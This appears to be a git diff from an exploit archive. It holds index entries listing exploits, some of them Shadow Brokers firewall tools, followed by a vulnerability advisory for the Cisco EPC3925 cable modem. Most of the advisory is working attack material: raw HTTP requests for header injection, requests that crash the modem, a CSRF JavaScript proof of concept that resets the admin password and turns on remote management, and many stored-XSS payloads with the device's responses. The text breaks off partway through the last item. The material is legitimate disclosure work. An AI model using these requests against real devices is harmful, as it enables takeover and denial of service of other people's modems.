40258,platforms/hardware/remote/40258.txt,"Cisco ASA 8.x - 'EXTRABACON' Authentication Bypass",2016-08-18,"Shadow Brokers",hardware,remote,161
40259,platforms/win_x86/shellcode/40259.c,"Windows x86 - InitiateSystemShutdownA() Shellcode (599 bytes)",2016-08-18,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
40260,platforms/cgi/webapps/40260.sh,"SIEMENS IP Camera CCMW1025 x.2.2.1798 - Remote Admin Credentials Change",2016-08-18,"Todor Donev",cgi,webapps,80
40261,platforms/cgi/webapps/40261.txt,"Honeywell IP-Camera HICC-1100PT - Credentials Disclosure",2016-08-18,"Yakir Wizman",cgi,webapps,80
@ -36463,15 +36466,15 @@ id,file,description,date,author,platform,type,port
40267,platforms/cgi/webapps/40267.txt,"MESSOA IP-Camera NIC990 - Authentication Bypass / Configuration Download",2016-08-19,"Todor Donev",cgi,webapps,80
40268,platforms/windows/local/40268.rb,"Microsoft Windows - Fileless UAC Protection Bypass Privilege Escalation (Metasploit)",2016-08-19,"Pablo González",windows,local,0
40269,platforms/cgi/webapps/40269.txt,"ZYCOO IP Phone System - Remote Command Execution",2016-08-19,0x4148,cgi,webapps,0
40270,platforms/linux/local/40270.txt,"Watchguard Firewalls - ifconfig Privilege Escalation (ESCALATEPLOWMAN)",2016-08-19,"Shadow Brokers",linux,local,0
40271,platforms/hardware/local/40271.txt,"Cisco ASA / PIX - Privilege Escalation (EPICBANANA)",2016-08-19,"Shadow Brokers",hardware,local,0
40272,platforms/cgi/webapps/40272.txt,"TOPSEC Firewalls - Remote Code Execution (ELIGIBLECONTESTANT)",2016-08-19,"Shadow Brokers",cgi,webapps,0
40273,platforms/cgi/webapps/40273.txt,"TOPSEC Firewalls - Remote Code Execution (ELIGIBLECANDIDATE)",2016-08-19,"Shadow Brokers",cgi,webapps,0
40274,platforms/cgi/webapps/40274.txt,"TOPSEC Firewalls - Remote Code Execution (ELIGIBLEBOMBSHELL)",2016-08-19,"Shadow Brokers",cgi,webapps,0
40275,platforms/hardware/remote/40275.txt,"TOPSEC Firewalls - Remote Exploit (ELIGIBLEBACHELOR)",2016-08-19,"Shadow Brokers",hardware,remote,0
40276,platforms/hardware/webapps/40276.txt,"Fortigate Firewalls - Remote Code Execution (EGREGIOUSBLUNDER)",2016-08-19,"Shadow Brokers",hardware,webapps,0
40270,platforms/linux/local/40270.txt,"Watchguard Firewalls - 'ESCALATEPLOWMAN' ifconfig Privilege Escalation",2016-08-19,"Shadow Brokers",linux,local,0
40271,platforms/hardware/local/40271.txt,"Cisco ASA / PIX - 'EPICBANANA' Privilege Escalation",2016-08-19,"Shadow Brokers",hardware,local,0
40272,platforms/cgi/webapps/40272.txt,"TOPSEC Firewalls - 'ELIGIBLECONTESTANT' Remote Code Execution",2016-08-19,"Shadow Brokers",cgi,webapps,0
40273,platforms/cgi/webapps/40273.txt,"TOPSEC Firewalls - 'ELIGIBLECANDIDATE' Remote Code Execution",2016-08-19,"Shadow Brokers",cgi,webapps,0
40274,platforms/cgi/webapps/40274.txt,"TOPSEC Firewalls - 'ELIGIBLEBOMBSHELL' Remote Code Execution",2016-08-19,"Shadow Brokers",cgi,webapps,0
40275,platforms/hardware/remote/40275.txt,"TOPSEC Firewalls - 'ELIGIBLEBACHELOR' Remote Exploit",2016-08-19,"Shadow Brokers",hardware,remote,0
40276,platforms/hardware/webapps/40276.txt,"Fortigate Firewalls - 'EGREGIOUSBLUNDER' Remote Code Execution",2016-08-19,"Shadow Brokers",hardware,webapps,0
40277,platforms/cgi/webapps/40277.sh,"MESSOA IP Cameras (Multiple Models) - Unauthenticated Password Change",2016-08-19,"Todor Donev",cgi,webapps,80
40278,platforms/php/webapps/40278.txt,"tcPbX - (tcpbx_lang) Local File Inclusion",2016-08-19,0x4148,php,webapps,0
40278,platforms/php/webapps/40278.txt,"tcPbX - 'tcpbx_lang' Local File Inclusion",2016-08-19,0x4148,php,webapps,0
40308,platforms/multiple/dos/40308.txt,"Adobe Flash - Stage.align Setter Use-After-Free",2016-08-29,"Google Security Research",multiple,dos,0
40282,platforms/cgi/webapps/40282.txt,"JVC IP-Camera VN-T216VPRU - Local File Disclosure",2016-08-22,"Yakir Wizman",cgi,webapps,0
40283,platforms/cgi/webapps/40283.txt,"Honeywell IP-Camera HICC-1100PT - Local File Disclosure",2016-08-22,"Yakir Wizman",cgi,webapps,0

platforms/asp/webapps/40383.txt Executable file

@ -0,0 +1,695 @@
# Title: Cisco EPC 3925 Multiple Vulnerabilities
# Vendor: http://www.cisco.com/
# Vulnerable Version(s): Cisco EPC3925 (EuroDocsis 3.0 2-PORT Voice Gateway)
# Date: 15.09.2016
# Author: Patryk Bogdan
========
Vulnerability list:
1. HTTP Response Injection via 'Lang' Cookie
2. DoS via 'Lang' Cookie
3. DoS in Wireless Client List via 'h_sortWireless'
4. (Un)authorized modem restart (Channel Selection)
5. CSRF
6. Stored XSS in SMTP Settings (Administration -> Reportning)
7. Stored XSS in User Name #1 (e.g Administration -> Managment / Setup -> Quick Setup)
8. Stored XSS in User Name #2 (Access Restrictions -> User Setup)
9. Stored XSS in ToD Filter (Access Restrictions -> Time of Day Rules)
10. Stored XSS in Rule Name (Access Restrictions -> Basic Rules)
11. Stored XSS in Domain Name (Access Restrictions -> Basic Rules)
12. Stored XSS in Network Name (e.g Wireless -> Basic Settings)
13. Stored XSS in DDNS Settings (Setup -> DDNS)
14. Stored XSS in Advanced VPN Setup (Security -> VPN -> Advanced Settings)
========
1. HTTP Response Injection
It is able to inject arbitrary data into device memory via 'Lang' cookie,
additional data will be stored until modem restart and will be returned with every http response.
#1 - Request:
POST /goform/Docsis_system HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Docsis_system.asp
Cookie: Lang=en; SessionID=171110
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
username_login=aaa&password_login=bbb&LanguageSelect=en%0d%0aSet-Cookie: pwned&Language_Submit=0&login=Log+In
#1 - Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: http://192.168.100.1/Docsis_system.asp
Content-type: text/html
Connection: close
(...)
#2 - Request:
GET / HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
#2 - Response:
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Set-Cookie: Lang=en
Set-Cookie: pwned
Set-Cookie: SessionID=219380
Content-Length: 1398
(...)
2. DoS via 'Lang' Cookie
Modem crashes when cookie variable in request is too long.
#1 - Request (crash via http injection):
POST /goform/Docsis_system HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Docsis_system.asp
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 142
username_login=aaa&password_login=bbb&LanguageSelect=enXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX&Language_Submit=0&login=Log+In
#1 - Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: http://192.168.100.1/Docsis_system.asp
Content-type: text/html
Connection: close
#2 - Request:
GET /Docsis_system.asp HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Docsis_system.asp
Connection: close
#2 - Response:
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Set-Cookie: Lang=enXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Set-Cookie: SessionID=163190
Content-Length: 18743
(...)
At this point modem crashes:
C:\Users\Patryk>ping -n 10 192.168.100.1
Pinging 192.168.100.1 with 32 bytes of data:
Request timed out.
Request timed out.
Reply from 192.168.0.10: Destination host unreachable.
Reply from 192.168.0.10: Destination host unreachable.
Reply from 192.168.0.10: Destination host unreachable.
Reply from 192.168.0.10: Destination host unreachable.
(...)
DoS can be also executed with single HTTP request, like this:
GET / HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/
Cookie: Lang=enXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX; SessionID=163190
Connection: close
3. DoS in Wireless Client List via 'h_sortWireless'
Modem crashes when variable for POST parameter 'h_sortWireless' is too long.
#1 - Request:
POST /goform/WClientMACList HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/WClientMACList.asp
Cookie: Lang=en; SessionID=71750
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 94
sortWireless=status&h_sortWireless=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
#1 - Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: http://192.168.100.1/WClientMACList.asp
Content-type: text/html
Connection: close
( ... crash ... )
4. (Un)authorized channel Selection
On Cisco 3925 unauthorized user can edit device channel settings and restart the modem. Such functionality should be available only for logged users, for example it's disabled on EPC 3928.
5. CSRF
There is no prevention against CSRF attacks, attacker can for example change admin credentials and enable remote managment in single request.
PoC:
<script>
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://192.168.100.1/goform/Administration", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "pl,en-US;q=0.7,en;q=0.3");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.withCredentials = true;
var body = "connection_mode=0&saRgIpMgmtWanDualIpAddrIP0=0&saRgIpMgmtWanDualIpAddrIP1=0&saRgIpMgmtWanDualIpAddrIP2=0&saRgIpMgmtWanDualIpAddrIP3=0&saRgIpMgmtWanDualIpRipAdvertised=0x0&wan_ip_1=0&wan_ip_2=0&wan_ip_3=0&wan_ip_4=0&wan_mask_1=0&wan_mask_2=0&wan_mask_3=0&wan_mask_4=0&wan_gw_1=0&wan_gw_2=0&wan_gw_3=0&wan_gw_4=0&Host_Name=&Domain_Name=&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns1_4=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_dns2_4=0&wan_mtuSize=0&sysname=admin&sysPasswd=newpass&sysConfirmPasswd=newpass&remote_management=enable&http_wanport=8080&upnp_enable=disable&save=Save+Settings&preWorkingMode=1&h_remote_management=enable&h_check_WebAccessUserIfLevel=2&h_upnp_enable=disable&h_wlan_enable=enable&h_user_type=common";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
</script>
6. Stored XSS in Administration -> Reporting
#1 - Request:
POST /goform/Log HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Log.asp
Cookie: Lang=en; SessionID=457480
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 236
email_enable=enable&smtp_server=%22+onmouseover%3Dalert%281%29+x%3D%22y&email_for_log=%22+onmouseover%3Dalert%282%29+x%3D%22y&SmtpUsername=%22+onmouseover%3Dalert%283%29+x%3D%22y&SmtpPassword=aaa&save=Save+Settings&h_email_enable=enable
#1 - Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: http://192.168.100.1/Log.asp
Content-type: text/html
Connection: close
#2 - Request:
GET /Log.asp HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Log.asp
Cookie: Lang=en; SessionID=457480
Connection: close
#2 - Response:
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Content-Length: 6454
(...)
<TD>
<input type="text" name="smtp_server" maxlength="255" size="30" value="" onmouseover=alert(1) x="y" />
</TD>
</TR>
<tr>
<TD>
<script language="javascript" type="text/javascript">dw(va_log_email3);</script>
</TD>
<TD>
<input type="text" name="email_for_log" maxlength="255" size="30" value="" onmouseover=alert(2) x="y"/>
</TD>
</TR>
<tr>
<TD>
<script language="javascript" type="text/javascript">dw(msg_smtp_username);</script>
</TD>
<TD>
<input type="text" name="SmtpUsername" maxlength="255" size="30" value="" onmouseover=alert(3) x="y" />
</TD>
</TR>
(...)
7. Stored XSS in User Name (Administration -> Managment / Setup -> Quick Setup)
#1 - Request:
POST /goform/Administration HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Administration.asp
Cookie: Lang=en; SessionID=457480
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 746
connection_mode=0&saRgIpMgmtWanDualIpAddrIP0=0&saRgIpMgmtWanDualIpAddrIP1=0&saRgIpMgmtWanDualIpAddrIP2=0&saRgIpMgmtWanDualIpAddrIP3=0&saRgIpMgmtWanDualIpRipAdvertised=0x0&wan_ip_1=0&wan_ip_2=0&wan_ip_3=0&wan_ip_4=0&wan_mask_1=0&wan_mask_2=0&wan_mask_3=0&wan_mask_4=0&wan_gw_1=0&wan_gw_2=0&wan_gw_3=0&wan_gw_4=0&Host_Name=&Domain_Name=&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns1_4=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_dns2_4=0&wan_mtuSize=0&sysname=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&sysPasswd=aaa&sysConfirmPasswd=aaa&remote_management=disable&upnp_enable=disable&save=Save+Settings&preWorkingMode=1&h_remote_management=disable&h_check_WebAccessUserIfLevel=2&h_upnp_enable=disable&h_wlan_enable=enable&h_user_type=common
#1 - Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: http://192.168.100.1/Quick_setup.asp
Content-type: text/html
Connection: close
#2 - Request:
GET /Quick_setup.asp HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Administration.asp
Cookie: Lang=en; SessionID=457480
Connection: close
#2 - Response:
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Content-Length: 34779
(...)
<tr>
<td nowrap>
<script language="javascript" type="text/javascript">dw(va_local_access2);</script>
</td>
<td nowrap>
<script>alert('XSS')</script>
</td>
</tr>
(...)
8. Stored XSS in User Name #2 (Access Restrictions -> User Setup)
#1 - Request:
POST /goform/Rg_UserSetup HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Rg_UserSetup.asp
Cookie: Lang=en; SessionID=1320560
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 118
NewUser=user onmouseover=alert('XSS')&Btn_AddUser=Add+User&AddUser=1&UserList=Default&RemoveUser=0&UserConfigChanged=0
#1 - Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: http://192.168.100.1/Rg_UserSetup.asp
Content-type: text/html
Connection: close
#2 - Request:
GET /Rg_UserSetup.asp HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Rg_UserSetup.asp
Cookie: Lang=en; SessionID=1320560
Connection: close
#2 - Response:
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Content-Length: 9706
(...)
<select onchange="submit();" name="UserList">
<option value=Default >1. Default<option value=user onmouseover=alert('XSS') selected>2. user onmouseover=alert('XSS
</select>
(...)
9. Stored XSS in ToD Filter
#1 - Request:
POST /goform/Rg_TodFilter HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Rg_TodFilter.asp
Cookie: Lang=en; SessionID=1320560
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 189
TodClient=<script>alert('XSS')</script>&TodAdd=Add&addTodClient=1&ToDComputers=No+filters+entered.&removeTodClient=&StartHour=12&StartMinute=00&StartAmPm=1&EndHour=12&EndMinute=00&EndAmPm=1
#1 - Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: http://192.168.100.1/Rg_TodFilter.asp
Content-type: text/html
Connection: close
#2 - Request:
GET /Rg_TodFilter.asp HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Rg_TodFilter.asp
Cookie: Lang=en; SessionID=1320560
Connection: close
#2 - Response:
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Content-Length: 9140
(...)
<select name="ToDComputers" onChange="submit();">
<option value=0 selected>1. <script>alert('XSS')</script>
</select>
(...)
10. Stored XSS in Rule Name (Access Restrictions -> Basic Rules)
#1 - Request:
POST /goform/Rg_ParentalBasic HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Rg_ParentalBasic.asp
Cookie: Lang=en; SessionID=1320560
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 282
NewContentRule=<script>alert('XSS')</script>&AddRule=Add+Rule&AddContentRule=1&ContentRules=0&RemoveContentRule=0&NewKeyword=&KeywordAction=0&NewDomain=&DomainAction=0&NewAllowedDomain=&AllowedDomainAction=0&ParentalPassword=*******&ParentalPasswordReEnter=*******&AccessDuration=30
#1 - Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: http://192.168.100.1/Rg_ParentalBasic.asp
Content-type: text/html
Connection: close
#2 - Request:
GET /Rg_ParentalBasic.asp HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Rg_ParentalBasic.asp
Cookie: Lang=en; SessionID=1320560
Connection: close
#2 - Response:
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Content-Length: 11126
(...)
<select name="ContentRules" onChange="submit();">
<option value=0 selected>1. Default<option value=1 >2. <script>alert('XSS')</script>
</select>
(...)
11. Stored XSS in Domain Name (Access Restrictions -> Basic Rules)
#1 - Request:
POST /goform/Rg_ParentalBasic HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Rg_ParentalBasic.asp
Cookie: Lang=en; SessionID=1320560
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 318
NewContentRule=&AddContentRule=&ContentRules=0&RemoveContentRule=0&NewKeyword=&KeywordAction=0&NewDomain=&DomainAction=0&NewAllowedDomain=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&AddAllowedDomain=Add+Allowed+Domain&AllowedDomainAction=1&ParentalPassword=*******&ParentalPasswordReEnter=*******&AccessDuration=30
#1 - Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: http://192.168.100.1/Rg_ParentalBasic.asp
Content-type: text/html
Connection: close
#2 - Request:
GET /Rg_ParentalBasic.asp HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Rg_ParentalBasic.asp
Cookie: Lang=en; SessionID=1320560
Connection: close
#2 - Response:
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Content-Length: 10741
(...)
<select name="AllowedDomainList" size=5>
<option value="1"><script>alert('XSS')</script>
</select>
(...)
12. Stored XSS in Network Name (e.g Wireless -> Basic Settings)
#1 - Request:
POST /goform/Quick_setup HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Quick_setup.asp
Cookie: Lang=en; SessionID=1320560
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 371
Password=&PasswordReEnter=&setup_wifi_enable=enable&ssid=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&security_mode=psk2_mixed&wpa_enc=tkip%2Baes&wpa_psk_key=231503725&radius_ip_1=0&radius_ip_2=0&radius_ip_3=0&radius_ip_4=0&keysize=64&tx_key=1&save=Save+Settings&h_setup_wifi_enable=enable&h_security_mode=psk2_mixed&h_wpa_enc=tkip%2Baes&qs_wds_setting=disable&UserId=
#1 - Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: http://192.168.100.1/Quick_setup.asp
Content-type: text/html
Connection: close
#2 - Request:
GET /Wireless.asp HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Quick_setup.asp
Cookie: Lang=en; SessionID=1320560
Connection: close
#2 - Response:
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Content-Length: 51653
(...)
<tr>
<td>
<B><script language="javascript" type="text/javascript">dw(vwnetwork_name);</script></B>
</td>
<td colspan="2">
<script>alert('XSS')</script>
</td>
</tr>
(...)
13. Stored XSS in DDNS Settings (Setup -> DDNS)
#1 - Request:
POST /goform/Setup_DDNS HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Setup_DDNS.asp
Cookie: Lang=en; SessionID=1320560
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 154
DdnsService=0&DdnsUserName=user" onmouseover=alert('XSS_1') x="&DdnsPassword=aaa x="&DdnsHostName=host" onmouseover=alert('XSS_2') x="y&save=Save+Settings
#1 - Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: http://192.168.100.1/Setup_DDNS.asp
Content-type: text/html
Connection: close
#2 - Request:
GET /Setup_DDNS.asp HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Setup_DDNS.asp
Cookie: Lang=en; SessionID=1320560
Connection: close
#2 - Response:
HTTP/1.1 200 OK
Content-type: text/html
Expires: Thu, 3 Oct 1968 12:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Connection: close
Content-Length: 5738
(...)
<td>
<input name="DdnsUserName" type="text" size="16" maxlength="64" value="user" onmouseover=alert('XSS_1') x="" />
</td>
(...)
<td>
<input name="DdnsHostName" type="text" size="32" maxlength="256" value="host" onmouseover=alert('XSS_2') x="y" />
</td>
(...)
14. Stored XSS in Adv. VPN Setup (Security -> VPN -> Advanced Settings)
#1 - Request:
POST /goform/vpn_adv HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/vpn_adv.asp
Cookie: Lang=en; SessionID=1320560
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 286
NegotiationMode=0&LocalIdentityType=2&LocalIdentity=abc%22+onmouseover%3Dalert%28%27XSS%27%29+x%3D%22y&RemoteIdentityType=2&RemoteIdentity=abc%22+onmouseover%3Dalert%28%27XSS%27%29+x%3D%22y&Phase1Encryption=2&Phase1Authentication=1&Phase1DhGroup=0&Phase1SaLifetime=28800&Phase2DhGroup=0
#1 - Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: http://192.168.100.1/vpn_adv.asp
Content-type: text/html
Connection: close
#2 - Request:
GET /vpn_adv.asp HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/vpn_adv.asp
Cookie: Lang=en; SessionID=1320560
Connection: close
